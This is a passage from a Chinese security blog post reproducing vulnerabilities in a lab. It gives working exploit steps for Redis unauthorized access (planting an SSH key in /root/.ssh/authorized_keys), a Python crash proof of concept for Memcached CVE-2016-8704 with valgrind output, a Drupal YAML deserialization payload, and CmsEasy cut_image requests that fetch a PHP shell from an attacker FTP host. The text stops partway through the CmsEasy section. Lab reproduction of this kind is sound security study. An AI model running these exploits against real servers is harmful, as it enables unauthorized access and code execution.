<!DOCTYPE html>












  


<html class="theme-next muse use-motion" lang="cn">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2"/>
<meta name="theme-color" content="#222">






  
  
    
      
    
    
      
    
  <script src="//cdn.bootcss.com/pace/1.0.2/pace.min.js"></script>
  <link href="//cdn.bootcss.com/pace/1.0.2/themes/blue/pace-theme-flash.min.css" rel="stylesheet">







<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />



















  
  
  
  

  
    
    
  

  
    
      
    

    
  

  

  
    
      
    

    
  

  
    
      
    

    
  

  
    
    
    <link href="//fonts.googleapis.com/css?family=Lato:300,300italic,400,400italic,700,700italic|Monda:300,300italic,400,400italic,700,700italic|Lobster Two:300,300italic,400,400italic,700,700italic|PT Mono:300,300italic,400,400italic,700,700italic&subset=latin,latin-ext" rel="stylesheet" type="text/css">
  






  

<link href="//maxcdn.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=6.4.0" rel="stylesheet" type="text/css" />


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=6.4.0">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=6.4.0">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=6.4.0">


  <link rel="mask-icon" href="/images/logo.svg?v=6.4.0" color="#222">









<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Muse',
    version: '6.4.0',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: false,
    fastclick: false,
    lazyload: false,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>


  




  <meta name="description" content="一个人固然寂寞，两个人孤灯下无言相对却可以更寂寞。  本文目录如下：  Redis 未授权访问漏洞 Memcached Server APPEND/PREPEND 远程代码执行漏洞(CVE-2016-8704) Drupal PECL YAML parser 远程代码执行漏洞 CmsEasy &amp;lt; 5.6 20161012 cut_image 代码执行漏洞 Weblogic弱密码综合环境 We">
<meta name="keywords" content="漏洞,CVE,redis,Drupal,weblogic,Supervisord,uWSGIPHP">
<meta property="og:type" content="article">
<meta property="og:title" content="vuls复现(一)">
<meta property="og:url" content="https://lengjibo.github.io/vuls复现/index.html">
<meta property="og:site_name" content="冷逸的个人博客|开往安河桥北~">
<meta property="og:description" content="一个人固然寂寞，两个人孤灯下无言相对却可以更寂寞。  本文目录如下：  Redis 未授权访问漏洞 Memcached Server APPEND/PREPEND 远程代码执行漏洞(CVE-2016-8704) Drupal PECL YAML parser 远程代码执行漏洞 CmsEasy &amp;lt; 5.6 20161012 cut_image 代码执行漏洞 Weblogic弱密码综合环境 We">
<meta property="og:locale" content="cn">
<meta property="og:image" content="http://ww1.sinaimg.cn/large/007F8GgBly1g1zvbqbk8mj30pa0fcgrz.jpg">
<meta property="og:image" content="http://ww1.sinaimg.cn/large/007F8GgBly1g1zvpsj6akj30ko067jvh.jpg">
<meta property="og:image" content="http://ww1.sinaimg.cn/large/007F8GgBly1g1zvsztdq6j30kd0bq46m.jpg">
<meta property="og:image" content="http://ww1.sinaimg.cn/large/007F8GgBly1g1zw5vil6ij30n10ac7co.jpg">
<meta property="og:image" content="http://ww1.sinaimg.cn/large/007F8GgBly1g1zw9gjkvdj30ir027gmo.jpg">
<meta property="og:image" content="http://ww1.sinaimg.cn/large/007F8GgBly1g1zwpufp4dj30n20buq46.jpg">
<meta property="og:image" content="http://ww1.sinaimg.cn/large/007F8GgBly1g1zwqdum1tj30n209q40g.jpg">
<meta property="og:image" content="http://ww1.sinaimg.cn/large/007F8GgBly1g1zy2jz3r8j30fh0d8jsq.jpg">
<meta property="og:image" content="http://ww1.sinaimg.cn/large/007F8GgBly1g2017hbcj9j31gu0inn17.jpg">
<meta property="og:image" content="http://ww1.sinaimg.cn/large/007F8GgBly1g2018ryi1bj31eo0mqwi0.jpg">
<meta property="og:image" content="http://ww1.sinaimg.cn/large/007F8GgBly1g201b1ao8tj317a0ivtf4.jpg">
<meta property="og:image" content="http://ww1.sinaimg.cn/large/007F8GgBly1g201f3xz6ij313k0ecwgd.jpg">
<meta property="og:image" content="http://ww1.sinaimg.cn/large/007F8GgBly1g201i0s21mj31460ffn0n.jpg">
<meta property="og:image" content="http://ww1.sinaimg.cn/large/007F8GgBly1g202ywwvxyj30ox0c8myv.jpg">
<meta property="og:image" content="http://ww1.sinaimg.cn/large/007F8GgBly1g2032fj0ohj31fp0fvtat.jpg">
<meta property="og:image" content="http://ww1.sinaimg.cn/large/007F8GgBly1g20347umuwj30zc0e5jsa.jpg">
<meta property="og:image" content="http://ww1.sinaimg.cn/large/007F8GgBly1g203deo2rvj30rb0himy6.jpg">
<meta property="og:image" content="http://ww1.sinaimg.cn/large/007F8GgBly1g203mrumxhj311v0i5t9r.jpg">
<meta property="og:image" content="http://ww1.sinaimg.cn/large/007F8GgBly1g20y7xjum9j30zd0f3jsd.jpg">
<meta property="og:image" content="http://ww1.sinaimg.cn/large/007F8GgBly1g20z8uelhjj31gd0db765.jpg">
<meta property="og:image" content="http://ww1.sinaimg.cn/large/007F8GgBly1g20zcj4d23j313w0ctmyc.jpg">
<meta property="og:image" content="http://ww1.sinaimg.cn/large/007F8GgBly1g20zih9ie0j30sh0azgmf.jpg">
<meta property="og:image" content="http://ww1.sinaimg.cn/large/007F8GgBly1g20zmzetdjj30mt04yjrb.jpg">
<meta property="og:updated_time" content="2019-04-13T06:26:32.000Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="vuls复现(一)">
<meta name="twitter:description" content="一个人固然寂寞，两个人孤灯下无言相对却可以更寂寞。  本文目录如下：  Redis 未授权访问漏洞 Memcached Server APPEND/PREPEND 远程代码执行漏洞(CVE-2016-8704) Drupal PECL YAML parser 远程代码执行漏洞 CmsEasy &amp;lt; 5.6 20161012 cut_image 代码执行漏洞 Weblogic弱密码综合环境 We">
<meta name="twitter:image" content="http://ww1.sinaimg.cn/large/007F8GgBly1g1zvbqbk8mj30pa0fcgrz.jpg">



  <link rel="alternate" href="/../../.deploy_git/atom.xml" title="冷逸的个人博客|开往安河桥北~" type="application/atom+xml" />




  <link rel="canonical" href="https://lengjibo.github.io/vuls复现/"/>



<script type="text/javascript" id="page.configurations">
  CONFIG.page = {
    sidebar: "",
  };
</script>

  <title>vuls复现(一) | 冷逸的个人博客|开往安河桥北~</title>
  









  <noscript>
  <style type="text/css">
    .use-motion .motion-element,
    .use-motion .brand,
    .use-motion .menu-item,
    .sidebar-inner,
    .use-motion .post-block,
    .use-motion .pagination,
    .use-motion .comments,
    .use-motion .post-header,
    .use-motion .post-body,
    .use-motion .collection-title { opacity: initial; }

    .use-motion .logo,
    .use-motion .site-title,
    .use-motion .site-subtitle {
      opacity: initial;
      top: initial;
    }

    .use-motion {
      .logo-line-before i { left: initial; }
      .logo-line-after i { right: initial; }
    }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="cn">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">冷逸的个人博客|开往安河桥北~</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
    
  </div>

  <div class="site-nav-toggle">
    <button aria-label="Toggle navigation bar">
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>



<nav class="site-nav">
  
    <ul id="menu" class="menu">
      
        
        
        
          
          <li class="menu-item menu-item-home">
    <a href="/" rel="section">
      <i class="menu-item-icon fa fa-fw fa-home"></i> <br />Startseite</a>
  </li>
        
        
        
          
          <li class="menu-item menu-item-about">
    <a href="/about/" rel="section">
      <i class="menu-item-icon fa fa-fw fa-user"></i> <br />Über</a>
  </li>
        
        
        
          
          <li class="menu-item menu-item-tags">
    <a href="/tags/" rel="section">
      <i class="menu-item-icon fa fa-fw fa-tags"></i> <br />Tags</a>
  </li>
        
        
        
          
          <li class="menu-item menu-item-categories">
    <a href="/categories/" rel="section">
      <i class="menu-item-icon fa fa-fw fa-th"></i> <br />Kategorien</a>
  </li>
        
        
        
          
          <li class="menu-item menu-item-archives">
    <a href="/archives/" rel="section">
      <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />Archiv</a>
  </li>
        
        
        
          
          <li class="menu-item menu-item-book">
    <a href="/book/" rel="section">
      <i class="menu-item-icon fa fa-fw fa-book"></i> <br />book</a>
  </li>

      
      
    </ul>
  

  
    

  

  
</nav>



  



</div>
    </header>

    


    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="https://lengjibo.github.io/vuls复现/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="冷逸">
      <meta itemprop="description" content="做一个温柔的人...">
      <meta itemprop="image" content="http://ww1.sinaimg.cn/large/007F8GgBly1g7vony4ltaj308w08wq30.jpg">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="冷逸的个人博客|开往安河桥北~">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">vuls复现(一)
              
            
          </h1>
        

        <div class="post-meta">
        
          <span class="post-time">

            
            
            

            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">Veröffentlicht am</span>
              

              
                
              

              <time title="Post created: 2019-04-12 15:01:46" itemprop="dateCreated datePublished" datetime="2019-04-12T15:01:46+08:00">2019-04-12</time>
            

            
              

              
                
                <span class="post-meta-divider">|</span>
                

                <span class="post-meta-item-icon">
                  <i class="fa fa-calendar-check-o"></i>
                </span>
                
                  <span class="post-meta-item-text">Edited on</span>
                
                <time title="Updated at: 2019-04-13 14:26:32" itemprop="dateModified" datetime="2019-04-13T14:26:32+08:00">2019-04-13</time>
              
            
          </span>

          
            <span class="post-category" >
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">in</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing"><a href="/categories/漏洞复现/" itemprop="url" rel="index"><span itemprop="name">漏洞复现</span></a></span>

                
                
              
            </span>
          

          
            
          

          
          

          
            <span class="post-meta-divider">|</span>
            <span class="post-meta-item-icon"
            >
            <i class="fa fa-eye"></i>
             Views:  
            <span class="busuanzi-value" id="busuanzi_value_page_pv" ></span>
            </span>
          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <p>一个人固然寂寞，两个人孤灯下无言相对却可以更寂寞。</p>
<hr>
<p>本文目录如下：</p>
<ul>
<li>Redis 未授权访问漏洞</li>
<li>Memcached Server APPEND/PREPEND 远程代码执行漏洞(CVE-2016-8704)</li>
<li>Drupal PECL YAML parser 远程代码执行漏洞</li>
<li>CmsEasy &lt; 5.6 20161012 cut_image 代码执行漏洞</li>
<li>Weblogic弱密码综合环境</li>
<li>Weblogic&lt;10.3.6’wls-wsat’XMLDecoder反序列化漏洞</li>
<li>uWSGIPHP目录穿越漏洞</li>
<li>TomcatPUT方法任意写文件漏洞</li>
<li>Supervisord远程命令执行漏洞</li>
</ul>
<p>所有拓扑大体如下：</p>
<p><img src="http://ww1.sinaimg.cn/large/007F8GgBly1g1zvbqbk8mj30pa0fcgrz.jpg" alt=""></p>
<p>文章篇幅较长，阅读时请做好心理准备</p>
<a id="more"></a>
<h2 id="Redis-未授权访问漏洞"><a href="#Redis-未授权访问漏洞" class="headerlink" title="Redis 未授权访问漏洞"></a>Redis 未授权访问漏洞</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">题目描述：如果将 Redis 绑定在 0.0.0.0:6379，会将Redis服务暴露到公网上，如果在没有开启认证的情况下，可以导致任意用户在可以访问目标服务器的情况下未授权访问Redis以及读取Redis的数据。</span><br><span class="line">攻击者在未授权访问Redis的情况下可以利用Redis的相关方法，如果运行 redis 的用户是 root 用户，攻击者可以成功将自己的公钥写入目标服务器的 /root/.ssh 文件夹的authotrized_keys 文件中，进而可以直接登录目标服务器。</span><br></pre></td></tr></table></figure>
<p>1、在攻击方生成一对ssh key</p>
<blockquote>
<p>$ ssh-keygen -t rsa</p>
</blockquote>
<p>默认情况下，生成后在用户的家目录下的 .ssh 目录下</p>
<p>2、将生成的公钥的值写入目标服务器</p>
<blockquote>
<p>$ (echo -e “\n\n”; cat ~/.ssh/id_rsa.pub; echo -e “\n\n”) &gt; /tmp/foo.txt<br>$ cat /tmp/foo.txt | redis-cli -h 192.168.1.100 -p 6379 -x set crackit</p>
</blockquote>
<p>加上 \n\n 是为了不破坏 ssh public key<br>crackit 是设置的 key，可随意指定</p>
<p>3.连接目标</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">$ redis-cli -h 192.168.1.100 -p 6379</span><br><span class="line">192.168.1.100:6379&gt; config set dir /root/.ssh/</span><br><span class="line">OK</span><br><span class="line">192.168.1.100:6379&gt; config get dir</span><br><span class="line">1) &quot;dir&quot;</span><br><span class="line">2) &quot;/root/.ssh&quot;</span><br><span class="line">192.168.1.100:6379&gt; config set dbfilename &quot;authorized_keys&quot;</span><br><span class="line">OK</span><br><span class="line">192.168.1.100:6379&gt; save</span><br><span class="line">OK</span><br></pre></td></tr></table></figure>
<p><img src="http://ww1.sinaimg.cn/large/007F8GgBly1g1zvpsj6akj30ko067jvh.jpg" alt=""></p>
<p>将目录设置为 /root/.ssh/ 目录后，再将备份文件名设置为 authorized_keys，通过 save 指令即可写入文件.</p>
<p>4.通过 ssh 连接目标</p>
<blockquote>
<p>ssh <a href="mailto:root@192.168.1.100" target="_blank" rel="noopener">root@192.168.1.100</a> -i ~/.ssh/id_rsa</p>
</blockquote>
<p><img src="http://ww1.sinaimg.cn/large/007F8GgBly1g1zvsztdq6j30kd0bq46m.jpg" alt=""></p>
<p>默认会使用 id_rsa 如果改过文件名则可以用 -i 参数来指定。</p>
<h2 id="Memcached-Server-APPEND-PREPEND-远程代码执行漏洞-CVE-2016-8704"><a href="#Memcached-Server-APPEND-PREPEND-远程代码执行漏洞-CVE-2016-8704" class="headerlink" title="Memcached Server APPEND/PREPEND 远程代码执行漏洞(CVE-2016-8704)"></a>Memcached Server APPEND/PREPEND 远程代码执行漏洞(CVE-2016-8704)</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Memcached是一个广泛使用的高速缓存系统，近期研究者发现小于1.4.33的版本存在3个整数溢出漏洞，通过这几个漏洞攻击者可以触发堆溢出导致crash</span><br></pre></td></tr></table></figure>
<p>1.使用nmap获得目标端口号默认为11211</p>
<p><img src="http://ww1.sinaimg.cn/large/007F8GgBly1g1zw5vil6ij30n10ac7co.jpg" alt=""></p>
<p>2.执行poc</p>
<p>poc内容如下：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#!/usr/bin/env python</span></span><br><span class="line"><span class="comment"># coding:utf-8</span></span><br><span class="line"><span class="keyword">import</span> struct</span><br><span class="line"><span class="keyword">import</span> socket</span><br><span class="line"><span class="keyword">import</span> sys</span><br><span class="line"></span><br><span class="line">MEMCACHED_REQUEST_MAGIC = <span class="string">"\x80"</span></span><br><span class="line">OPCODE_PREPEND_Q = <span class="string">"\x1a"</span></span><br><span class="line">key_len = struct.pack(<span class="string">"!H"</span>, <span class="number">0xfa</span>)</span><br><span class="line">extra_len = <span class="string">"\x00"</span></span><br><span class="line">data_type = <span class="string">"\x00"</span></span><br><span class="line">vbucket = <span class="string">"\x00\x00"</span></span><br><span class="line">body_len = struct.pack(<span class="string">"!I"</span>, <span class="number">0</span>)</span><br><span class="line">opaque = struct.pack(<span class="string">"!I"</span>, <span class="number">0</span>)</span><br><span class="line">CAS = struct.pack(<span class="string">"!Q"</span>, <span class="number">0</span>)</span><br><span class="line">body = <span class="string">"A"</span> * <span class="number">1024</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> len(sys.argv) != <span class="number">3</span>:</span><br><span class="line">    <span class="keyword">print</span> <span class="string">"./poc_crash.py &lt;server&gt; &lt;port&gt;"</span></span><br><span class="line"></span><br><span class="line">packet = MEMCACHED_REQUEST_MAGIC + OPCODE_PREPEND_Q + key_len + extra_len</span><br><span class="line">packet += data_type + vbucket + body_len + opaque + CAS</span><br><span class="line">packet += body</span><br><span class="line"></span><br><span class="line">set_packet = <span class="string">"set testkey 0 60 4\r\ntest\r\n"</span></span><br><span class="line">get_packet = <span class="string">"get testkey\r\n"</span></span><br><span class="line"></span><br><span class="line">s1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)</span><br><span class="line">s1.connect((sys.argv[<span class="number">1</span>], int(sys.argv[<span class="number">2</span>])))</span><br><span class="line">s1.sendall(set_packet)</span><br><span class="line"><span class="keyword">print</span> s1.recv(<span class="number">1024</span>)</span><br><span class="line">s1.close()</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)</span><br><span class="line">s2.connect((sys.argv[<span class="number">1</span>], int(sys.argv[<span class="number">2</span>])))</span><br><span class="line">s2.sendall(packet)</span><br><span class="line"><span class="keyword">print</span> s2.recv(<span class="number">1024</span>)</span><br><span class="line">s2.close()</span><br><span class="line"></span><br><span class="line">s3 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)</span><br><span class="line">s3.connect((sys.argv[<span class="number">1</span>], int(sys.argv[<span class="number">2</span>])))</span><br><span class="line">s3.sendall(get_packet)</span><br><span class="line">s3.recv(<span class="number">1024</span>)</span><br><span class="line">s3.close()</span><br></pre></td></tr></table></figure>
<p><img src="http://ww1.sinaimg.cn/large/007F8GgBly1g1zw9gjkvdj30ir027gmo.jpg" alt=""></p>
<p>如果服务端服务崩溃则代表执行成功</p>
<p>如果使用 valgrind 调试启动的环境，则会看到类似如下信息：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br></pre></td><td class="code"><pre><span class="line">36: going from conn_closing to conn_closed</span><br><span class="line">&lt;37 new auto-negotiating client connection</span><br><span class="line">37: going from conn_new_cmd to conn_waiting</span><br><span class="line">37: going from conn_waiting to conn_read</span><br><span class="line">37: going from conn_read to conn_parse_cmd</span><br><span class="line">37: Client using the binary protocol</span><br><span class="line">&lt;37 Read binary protocol data:</span><br><span class="line">&lt;37    0x80 0x1a 0x00 0xfa</span><br><span class="line">&lt;37    0x00 0x00 0x00 0x00</span><br><span class="line">&lt;37    0x00 0x00 0x00 0x00</span><br><span class="line">&lt;37    0x00 0x00 0x00 0x00</span><br><span class="line">&lt;37    0x00 0x00 0x00 0x00</span><br><span class="line">&lt;37    0x00 0x00 0x00 0x00</span><br><span class="line">37: going from conn_parse_cmd to conn_nread</span><br><span class="line">Value len is -250</span><br><span class="line">==8== Thread 4:</span><br><span class="line">==8== Invalid write of size 8</span><br><span class="line">==8==    at 0x4C326CB: memcpy@@GLIBC_2.14 (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)</span><br><span class="line">==8==    by 0x4132C8: memcpy (string3.h:53)</span><br><span class="line">==8==    by 0x4132C8: do_item_alloc (items.c:238)</span><br><span class="line">==8==    by 0x40A884: process_bin_append_prepend (memcached.c:2302)</span><br><span class="line">==8==    by 0x40A884: complete_nread_binary (memcached.c:2425)</span><br><span class="line">==8==    by 0x40A884: complete_nread (memcached.c:2484)</span><br><span class="line">==8==    by 0x40D367: drive_machine (memcached.c:4656)</span><br><span class="line">==8==    by 0x4E47A0B: event_base_loop (in /usr/lib/x86_64-linux-gnu/libevent-2.0.so.5.1.9)</span><br><span class="line">==8==    by 0x414874: worker_libevent (thread.c:380)</span><br><span class="line">==8==    by 0x52A26B9: start_thread (pthread_create.c:333)</span><br><span class="line">==8==  Address 0x5d1ae90 is 0 bytes after a block of size 1,048,512 alloc&apos;d</span><br><span class="line">==8==    at 0x4C2DB8F: malloc (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)</span><br><span class="line">==8==    by 0x40F9DF: memory_allocate (slabs.c:538)</span><br><span class="line">==8==    by 0x40F9DF: do_slabs_newslab (slabs.c:233)</span><br><span class="line">==8==    by 0x40FA6E: do_slabs_alloc (slabs.c:328)</span><br><span class="line">==8==    by 0x41007E: slabs_alloc (slabs.c:584)</span><br><span class="line">==8==    by 0x4131E6: do_item_alloc (items.c:180)</span><br><span class="line">==8==    by 0x407741: process_update_command (memcached.c:3403)</span><br><span class="line">==8==    by 0x40B2FF: process_command (memcached.c:3836)</span><br><span class="line">==8==    by 0x40CE0B: try_read_command (memcached.c:4205)</span><br><span class="line">==8==    by 0x40CE0B: drive_machine (memcached.c:4618)</span><br><span class="line">==8==    by 0x4E47A0B: event_base_loop (in /usr/lib/x86_64-linux-gnu/libevent-2.0.so.5.1.9)</span><br><span class="line">==8==    by 0x414874: worker_libevent (thread.c:380)</span><br><span class="line">==8==    by 0x52A26B9: start_thread (pthread_create.c:333)</span><br><span class="line">==8==</span><br></pre></td></tr></table></figure>
<p>docker poc</p>
<blockquote>
<p>$ docker run registry.cn-hangzhou.aliyuncs.com/lo0o-rush/memcached:cve-2016-8704 {ip地址} {端口号}</p>
</blockquote>
<h2 id="Drupal-PECL-YAML-parser-远程代码执行漏洞"><a href="#Drupal-PECL-YAML-parser-远程代码执行漏洞" class="headerlink" title="Drupal PECL YAML parser 远程代码执行漏洞"></a>Drupal PECL YAML parser 远程代码执行漏洞</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">Drupal是使用PHP语言编写的开源内容管理框架（CMF），它由内容管理系统（CMS）和PHP开发框架（Framework）共同构成。Drupal Core的YAML解析器处理不当所导致的一个远程代码执行漏洞。</span><br><span class="line"></span><br><span class="line">Drupal Core - Multiple Vulnerabilities - SA-CORE-2017-003 ( 外网链接：https://www.drupal.org/SA-CORE-2017-003 )</span><br><span class="line">CVE-2017-6920:Drupal远程代码执行漏洞分析及POC构造 ( 外网链接：http://paper.seebug.org/334/ )</span><br></pre></td></tr></table></figure>
<p>1.序列化一个GuzzleHttp\Psr7\FnStream类, 并给该序列化字符串加上yaml的!php/object tag(注意一定要转义):</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">!php/object <span class="string">"O:24:\"GuzzleHttp\\Psr7\\FnStream\":2:&#123;s:33:\"\0GuzzleHttp\\Psr7\\FnStream\0methods\";a:1:&#123;s:5:\"close\";s:7:\"phpinfo\";&#125;s:9:\"_fn_close\";s:7:\"phpinfo\";&#125;"</span></span><br></pre></td></tr></table></figure>
<p>2.登录一个管理员账号，访问如下url:</p>
<blockquote>
<p><a href="http://127.0.0.1:8000/admin/config/development/configuration/single/import" target="_blank" rel="noopener">http://127.0.0.1:8000/admin/config/development/configuration/single/import</a></p>
</blockquote>
<p><img src="http://ww1.sinaimg.cn/large/007F8GgBly1g1zwpufp4dj30n20buq46.jpg" alt=""></p>
<p>3.点击 import 后，触发：</p>
<p><img src="http://ww1.sinaimg.cn/large/007F8GgBly1g1zwqdum1tj30n209q40g.jpg" alt=""></p>
<h2 id="CmsEasy-lt-5-6-20161012-cut-image-代码执行漏洞"><a href="#CmsEasy-lt-5-6-20161012-cut-image-代码执行漏洞" class="headerlink" title="CmsEasy &lt; 5.6 20161012 cut_image 代码执行漏洞"></a>CmsEasy &lt; 5.6 20161012 cut_image 代码执行漏洞</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">CmsEasy &lt; 5.6_20161012 版本 cut_image_action 函数存在代码执行漏洞，远程攻击者可在未登录的情况下向服务器上传任意文件，执行任意代码，获取服务器权限。</span><br></pre></td></tr></table></figure>
<p>1.图片处理</p>
<p>将 poc_phpinfo_700x1120.png，上传至攻击者FTP服务器并将后缀改为.php，如文件名被重命名为phpinfo.php</p>
<p>不会生成shell的可以参考这两篇文章：</p>
<p><a href="https://xz.aliyun.com/t/416" target="_blank" rel="noopener">https://xz.aliyun.com/t/416</a><br><a href="https://xz.aliyun.com/t/365" target="_blank" rel="noopener">https://xz.aliyun.com/t/365</a></p>
<p>2.验证漏洞</p>
<p>发起 POST 请求，地址为：</p>
<p>http://目标网站/index.php?case=tool&amp;act=cut_image</p>
<p>POST data:</p>
<p>pic=1ftp://攻击者FTP地址/phpinfo.php&amp;w=700&amp;h=1120&amp;x1=0&amp;x2=700&amp;y1=0&amp;y2=1120</p>
<p><img src="http://ww1.sinaimg.cn/large/007F8GgBly1g1zy2jz3r8j30fh0d8jsq.jpg" alt=""></p>
<p>3.成功返回：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;&quot;code&quot;:&quot;\r\n \/\/$(&apos;#cut_preview&apos;).attr(&apos;src&apos;,&apos;\/upload\/images\/201612\/148159258747.php&apos;);\r\n $(&apos;#thumb&apos;).val(&apos;\/upload\/images\/201612\/148159258747.php&apos;);\r\n\t\t\t\t alert(lang(&apos;save_success&apos;));\r\n &quot;&#125;</span><br></pre></td></tr></table></figure>
<p>4.访问上传成功后的php文件</p>
<p>http://你的 IP 地址:端口号/upload/images/201612/148159258747.php</p>
<p>POST data 详细说明<br>w=x2=图片宽度<br>h=y2=图片高度<br>x1=y1=固定0</p>
<p>同一张图片，请求时若指定的宽度和高度的值不相同，gd 库转换后的结果也不相同</p>
<p>如果$_POST[‘pic’]开头4个字符不是http的话，就认为是本站的文件，会从前面抽取掉baseurl（等于返回文件相对路径）所以构造的时候 如果站点不是放在根目录 则需要在前面补位strlen(base_url)+2 如果放在根目录 也需要补上1位（/的长度）</p>
<p>举个例子：</p>
<p>目标站 <a href="http://www.target.com/easy/cmseasy/" target="_blank" rel="noopener">http://www.target.com/easy/cmseasy/</a> 放在 cmseasy 子目录,就需要补上strlen(base_url)+2 = strlen(‘cmseasy’) + 2 = 9位，POST数据就是</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">pic=111111111ftp://hacker.db/shell.php&amp;w=228&amp;h=146&amp;x1=0&amp;x2=228&amp;y1=0&amp;y2=146</span><br></pre></td></tr></table></figure>
